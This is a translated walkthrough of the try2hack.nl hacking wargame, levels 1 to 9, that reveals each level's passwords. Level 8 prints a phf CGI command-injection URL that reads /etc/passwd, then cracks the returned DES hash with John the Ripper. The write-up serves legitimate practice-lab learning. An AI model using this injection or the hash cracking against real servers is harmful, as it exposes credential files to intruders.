Network shortcuts


A few days ago (June 13, 02), someone sent me the URL http://www.try2hack.nl/level1.html over ICQ with the words "test your strength". I admit, every task on this site was difficult in its own way, but at the same time interesting. To everyone who has not taken this test yet, I strongly recommend trying it. And those who have already tried their luck and did not reach the 10th task, read this article =)
Well, let's begin. I'll say right away that I describe solutions only to the first 9 tasks, and I go into detail only on the complex and interesting ones.

#1.

Elementary. Here is the JS source of the password check:
 <SCRIPT LANGUAGE="JavaScript">
 function Try(passwd) {
   if (passwd == "hackerzzz") {
     alert("Alright! On to level 2 ...");
     location.href = "levvel2.html";
   }
   else {
     alert("The password is incorrect. Please Do not Try Again.");
     location.href = "http://www.disney.com";
   }
 }
 </SCRIPT>
In the third line, the entered value is checked against the word "hackerzzz", which in this case plays the role of a password.

# 2.

I confess, at first glance the task seemed difficult to me. I was wrong =)
Download the Flash file, open it in Notepad (a hex editor also works), and at the very bottom (addresses 00000440-00000490) we see:
txtUsername ...... Try2Hack.I .... txtPassword ...... NokiaIsGood.I .......... LLeVeLL3.html
Login: Try2Hack
Password: NokiaIsGood
Next task: LLeVeLL3.html

# 3.

A very clever and interesting task.
Here is the JS source:
 <SCRIPT language="JavaScript">
 pwd = prompt("Please enter the password for level 3:", "");
 if (pwd == PASSWORD) {
   alert("Alright!\nEntering Level 4 ...");
   location.href = CORRECTSITE;
 } else {
   alert("WRONG!\nBack to disneyland !!!");
   location.href = WRONGSITE;
 }
 PASSWORD = "AbCdE";
 CORRECTSITE = "level4.html";
 WRONGSITE = "http://www.disney.com";
 </SCRIPT>
It would seem that the password is "AbCdE", but how can that work if it is assigned only at the end? The PASSWORD variable must already have been defined at the time of the check, otherwise the interpreter would give an error like "PASSWORD is undefined". Only after 20 minutes of thinking did this line catch my eye:
<SCRIPT src="JavaScript"></SCRIPT>
It just had not occurred to me that "JavaScript" is a file =))) And that file is exactly where the real values of the variables were:
PASSWORD = "TheCorrectAnswer";
CORRECTSITE = "thelevel4.html";
WRONGSITE = "http://www.disney.com";

#4.

While poking around in the applet, my attention was drawn to the strings at addresses 00000A60-00000A80. The applet read lines from a file *level4* (this was confirmed later). Most likely, it was a password file. Most interestingly, it did this on my own hard drive. That is, the file *level4* was either on the internet or on my computer. And if on mine, where? Right: either in the cookies or in the Temp folders. After cleaning out both, we went to the page with the applet again. A couple of files appeared in Temp, one of which was level4[2].txt.
Content:
5_level_5.html
Try2Hack
AppletsAreEasy
By the way, as a decoy, the applet contained this: "txtUsername = AlmostAHacker ..... txtPassword = ZqrE01A2d". Sneaky =)
/* Gr33tz 2 godson */

#5.

We are asked to download the file level5.exe. It asks for a login and password, which are obviously stored in the file itself. Opening it in a hex editor, this caught my eye:
http://www.try2hack.f2s.com/login-level6.html ..... txtUsername = AlmostAHacker ..... txtPassword = ZqrE01A2d
Addresses: 000019F0-00001A50.
Too easy, I thought. And indeed, the passwords did not fit. Next, a disassembler came to the rescue =):
Login: Try2Hack
Password: OutOfInspiration
Next task: level-6.html
/* gr33tz 2 a3oX =) */

# 6.

A very confusing task. Once again we are asked to download a program, which this time connects to the server right in front of you and checks the data you enter for validity. This time the creators honestly warn: "this is not level 5, you can not decompile this exe's".
The sniffer SpyNet came to the rescue. I will not describe what was done and how (that needs a separate article); I will only show the packet that interests us:
  0000: 44 45 53 54 00 00 20 53 52 43 00 00 08 00 45 00 DEST .. SRC .... E.
 0010: 02 40 5F 78 40 00 71 06 14 E0 D5 13 8C 02 C2 57. @ _ x @ .q ........ W
 0020: 6F F2 00 50 04 AE EC 04 FD 8C 1A 9A 11 B0 50 10 o..P .......... P.
 0030: 40 7C AE D3 00 00 48 54 54 50 2F 31 2E 31 20 32 @ | .... HTTP / 1.1 2
 0040: 30 30 20 4F 4B 0D 0A 44 61 74 65 3A 20 53 75 6E 00 OK..Date: Sun
 0050: 2C 20 31 34 20 41 70 72 20 32 30 30 32 20 31 38, 14 Apr 2002 18
 0060: 3A 32 32 3A 35 35 20 47 4D 54 0D 0A 53 65 72 76: 22: 55 GMT..Serv
 0070: 65 72 3A 20 41 70 61 63 68 65 0D 0A 43 61 63 68 er: Apache..Cach
 0080: 65 2D 43 6F 6E 74 72 6F 6C 3A 20 6D 61 78 2D 61 e-Control: max-a
 0090: 67 65 3D 36 30 34 38 30 30 0D 0A 45 78 70 69 72 ge = 604800..Expir
 00A0: 65 73 3A 20 53 75 6E 2C 20 32 31 20 41 70 72 20 es: Sun, 21 Apr 
 00B0: 32 30 30 32 20 31 38 3A 32 32 3A 35 35 20 47 4D 2002 18:22:55 GM
 00C0: 54 0D 0A 4C 61 73 74 2D 4D 6F 64 69 66 69 65 64 T..Last-Modified
 00D0: 3A 20 57 65 64 2C 20 31 38 20 41 70 72 20 32 30: Wed, 18 Apr 20
 00E0: 30 31 20 31 35 3A 32 38 3A 30 30 20 47 4D 54 0D 01 15:28:00 GMT.
 00F0: 0A 45 54 61 67 3A 20 22 30 2D 63 63 2D 33 61 64 .ETag: "0-cc-3ad
 0100: 64 62 32 38 30 22 0D 0A 41 63 63 65 70 74 2D 52 db280 ".. Accept-R
 0110: 61 6E 67 65 73 3A 20 62 79 74 65 73 0D 0A 43 6F anges: bytes..Co
 0120: 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 30 ntent-Length: 20
 0130: 34 0D 0A 4B 65 65 70 2D 41 6C 69 76 65 3A 20 74 4..Keep-Alive: t
 0140: 69 6D 65 6F 75 74 3D 31 35 2C 20 6D 61 78 3D 31 imeout = 15, max = 1
 0150: 30 30 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 00..Connection: 
 0160: 4B 65 65 70 2D 41 6C 69 76 65 0D 0A 43 6F 6E 74 Keep-Alive..Cont
 0170: 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 70 ent-Type: text / p
 0180: 6C 61 69 6E 0D 0A 0D 0A 00 28 45 4E 43 52 59 50 lain ..... (ENCRYP
 0190: 54 49 4F 4E 20 54 59 50 45 29 0D 0A 42 2A 43 2A TION TYPE) .. B * C *
 01A0: 4E 2A 2A 4E 0D 0A 0D 0A 28 55 53 45 52 4E 41 4D N ** N .... (USERNAM
 01B0: 45 29 0D 0A 61 62 61 62 61 20 61 62 62 61 62 20 E) .. ababa abbab 
 01C0: 62 61 61 61 61 20 61 61 61 62 62 0D 0A 0D 0A 28 baaaa aaabb .... (
 01D0: 50 41 53 53 57 4F 52 44 29 0D 0A 61 62 61 62 61 PASSWORD) .. ababa
 01E0: 20 61 61 61 61 61 20 61 62 62 61 61 20 61 62 62 aaaaa abbaa abb
 01F0: 62 61 20 61 61 61 61 61 20 62 61 61 61 61 20 62 ba aaaaa baaaa b
 0200: 61 61 62 61 20 62 61 62 62 61 0D 0A 0D 0A 28 50 aaba babba .... (P
 0210: 41 47 45 29 0D 0A 61 62 61 62 61 20 61 61 62 61 AGE) .. ababa aaba
 0220: 61 20 62 61 61 62 62 20 61 61 62 61 61 20 61 62 a baabb aabaa ab
 0230: 61 62 61 20 62 61 61 61 62 20 61 61 62 61 61 20 aba baaab aabaa 
 0240: 62 61 61 62 62 20 61 61 62 61 61 20 61 62 baabb aabaa ab
Slightly clipped (just try copying properly from SpyNet), but the main part (password, login, page) is clearly visible. It would seem that the job is done, but no. All the data was encrypted :-/
(USERNAME) .. ababa abbab baaaa aaabb ....
(PASSWORD) .. ababa aaaaa abbaa abbba aaaaa baaaa baaba babba ....
I took John the Ripper and started brute-forcing ... just kidding =)) This was Bacon's algorithm. A completely trivial algorithm, not even encryption but encoding:
aaaaa = a
aaaab = b
aaaba = c
aaabb = d
etc.
The result of manual decoding was:
Login: LORD
Password: LANPARTY
Page: LEVELSEVEN.html
Study computer science, kids =)
/* gr33tz 2 D4rkGr3y ;) */
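
The manual decoding above, as an added Python example (not code from the original article). It assumes the 24-letter form of Bacon's cipher, where I/J and U/V share a code, because that is the variant that reproduces LORD and LANPARTY from the captured groups; the function names are my own.

```python
# Bacon's cipher, 24-letter form: I/J share a code and U/V share a code.
ALPHABET_24 = "ABCDEFGHIKLMNOPQRSTUWXYZ"
SHARED = {"J": "I", "V": "U"}  # letters folded onto their partner

# Groups as they appear in the captured reply quoted in the article.
USERNAME = "ababa abbab baaaa aaabb"
PASSWORD = "ababa aaaaa abbaa abbba aaaaa baaaa baaba babba"
PAGE = "ababa aabaa baabb aabaa ababa baaab aabaa baabb aabaa ab"  # capture clipped


def bacon_decode(text, alphabet=ALPHABET_24):
    """Decode whitespace-separated a/b groups.

    Returns (plaintext, leftover). leftover is a trailing group shorter than
    five symbols, which happens when the capture is cut off mid-letter.
    """
    groups = text.lower().split()
    if any(set(g) - {"a", "b"} for g in groups):
        raise ValueError("input contains symbols other than a/b")
    leftover = groups.pop() if groups and len(groups[-1]) < 5 else ""
    out = []
    for group in groups:
        if len(group) != 5:
            raise ValueError(f"not a five-symbol group: {group!r}")
        index = int(group.translate(str.maketrans("ab", "01")), 2)
        if index >= len(alphabet):
            raise ValueError(f"code {group!r} is outside the alphabet")
        out.append(alphabet[index])
    return "".join(out), leftover


def fold(word):
    """Map J->I and V->U so a guessed word can be compared with decoded text."""
    return "".join(SHARED.get(c, c) for c in word.upper())


def completions(prefix, alphabet=ALPHABET_24):
    """Letters whose five-symbol code starts with a clipped prefix."""
    to_ab = str.maketrans("01", "ab")
    return [ch for i, ch in enumerate(alphabet)
            if format(i, "05b").translate(to_ab).startswith(prefix)]


if __name__ == "__main__":
    for label, blob in (("USERNAME", USERNAME), ("PASSWORD", PASSWORD), ("PAGE", PAGE)):
        text, rest = bacon_decode(blob)
        print(label, text, "| clipped:", rest or "-", completions(rest) if rest else "")
```

The page name decodes with U where the article writes V, and the clipped final group "ab" leaves eight candidate letters, one of which is the N that completes LEVELSEVEN.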

# 7.

We are given a capricious Perl script, level7.pl. Task: make it believe that:
1) the page from which we came to the site is http://www.microsoft.com/ms.htm
2) we use the Microsoft Internet Explorer 6.72 browser
3) the operating system is UNIX/LINUX
In general, the task is easy: we just need to generate an HTTP request whose headers contain this information. I.e.:
Referer: http://www.microsoft.com/ms.htm
User-agent: MSIE 6.72
But with the OS there is a small problem. There is no header field that explicitly specifies the operating system. It is usually extracted from the User-Agent. Hoping that level7.pl does exactly that, we sketched a Perl script that sent this request:
GET /cgi-bin/level7.pl HTTP/1.0
Referer: http://www.microsoft.com/ms.htm
User-Agent: MSIE 6.72 (UNIX/LINUX)
Accept: */*

And there it is =)
<A HREF="../Level-8.html"> Level 8 </A>

#8.

The name of the processing script, phf.cgi, immediately caught my attention. As I recall, it has a lot of break-ins on its conscience. Digging through the bug-tracker, I found an exploit:
/cgi-bin/phf.pp?Qalias=x%0a/bin/cat%20/etc/passwd
The answer was:
BuiZe: Bu3kOx4cCMX2U
The password is encrypted with ordinary DES. It took JTR 15 minutes to find the password. What it is I will not say; whoever needs it can decrypt it =)

#9.

The task page displays this message:
New message for BuiZe:

Level 8 completed!
Go to irc.<*>.org and join #<*>
There type /msg <*> begin

In other words, the battlefield moves to IRC. The names of the server, channel, and bot have been concealed for reasons that are (I hope) clear to everyone.

Task #9 consists of many mini-tasks.
We join their channel, #Try2Hack.
Write "/msg Try2Hack perfect-start"
So what will it give us? Here's what:
-TRY2HACK- Welcome to try2hack level 9! Decode the following lines to continue:
-TRY2HACK- Wbva # gel2unpx.yriry9. Gb trg gur xrl lbh arrq gb qrpbqr gur sbyybjvat yvar:
-TRY2HACK- GTI2MJj5YJ15DxVmERy1rQIZ =
-TRY2HACK-Tbbq yhpx, naq frr lbh ba # gel2unpx.yriry9.
Decode it yourself ... too hard? Well, this time we will not torment you:
http://www.degraeve.com/cgi-bin/rot13.cgi
There we decoded it, and this is what we got:
Join # try2hack.level9. To get the key you need to decode the following line:
TGV2ZWw5LW15QkIzREl1eDVM =
Good luck, and see you on # try2hack.level9.
We are in a panic, we do not know what this is:
TGV2ZWw5LW15QkIzREl1eDVM =
Hmm, at first glance it all seemed complicated to me, but then we remembered writing mIRC scripts: /echo $decode(TGV2ZWw5LW15QkIzREl1eDVM=,m) and we get Level9-myBB3DIux5L. With that in hand, we go to the channel,
-LEVEL9-XXX- Welcome, I am try2hack Level9! Decode the following lines to proceed:
-LEVEL9-XXX- 010011100110100101100011011001010010000001101010011011 ...
Good old binary ... if you do not want to decode it by hand:
http://www.nickciske.com/binary/index.php
We get "Nice job. Now type '/msg TRY2HACK showbug' to see the bug"
So we type /msg TRY2HACK showbug and are shown the bug:
-TRY2HACK- ovaq pgpe - CVAT pgpe: cvatercyl
-TRY2HACK-cebp pgpe: cvatercyl {avpx hubfg unaq qrfg xrl net} {
-TRY2HACK- frg qhe [rkce [havkgvzr] - $ net]
-TRY2HACK- chgfrei "ABGVPR $ avpx: Lbhe cvat ercyl gbbx $ qhe frpbaqf"}
Oh no, it is encoded again. Well, we use the link above again, for those who forgot %) ... we decoded it .... And here is the bug ... this is where we got stuck; if anyone solves it, send an e-mail to neon@balticum-tv.lt.
Thanks to NeoN for the solution of the 9th task =)
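
The first three decoding steps of this task (ROT13, then base64, then binary), as an added Python example that replaces the web converters and the mIRC $decode call; it is not code from the original article. The input strings are copied from the bot output quoted above, spacing included, and the function names are my own.

```python
import base64
import codecs

# Strings copied from the bot output quoted in the article.
ROT13_HINT = "Wbva # gel2unpx.yriry9. Gb trg gur xrl lbh arrq gb qrpbqr gur sbyybjvat yvar:"
ROT13_KEY = "GTI2MJj5YJ15DxVmERy1rQIZ ="
# The article truncates the binary line with "..."; only the visible part is used.
BINARY_PREFIX = "010011100110100101100011011001010010000001101010011011"


def rot13(text):
    """ROT13 rotates letters only; digits and punctuation pass through."""
    return codecs.decode(text, "rot13")


def b64_text(blob):
    """Base64-decode, dropping stray whitespace and recomputing '=' padding."""
    body = "".join(blob.split()).rstrip("=")
    body += "=" * (-len(body) % 4)
    return base64.b64decode(body, validate=True).decode("ascii")


def bits_text(bits):
    """Decode 8-bit ASCII; return (text, leftover_bits) for a truncated stream."""
    bits = "".join(bits.split())
    if set(bits) - {"0", "1"}:
        raise ValueError("not a bit string")
    whole = len(bits) - len(bits) % 8
    data = bytes(int(bits[i:i + 8], 2) for i in range(0, whole, 8))
    return data.decode("ascii"), bits[whole:]


def channel_key():
    """Layered decoding of the key line: ROT13 first, then base64."""
    return b64_text(rot13(ROT13_KEY))


if __name__ == "__main__":
    print(rot13(ROT13_HINT))
    print(rot13(ROT13_KEY), "->", channel_key())
    print(bits_text(BINARY_PREFIX))
```

The ROT13 layer has to come off first: base64 is case-sensitive, so the rotated string is still valid base64 but decodes to garbage.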

Author: D4rkGr3y


The material is published with the permission of DHGROUP (http://www.dhgroup.org)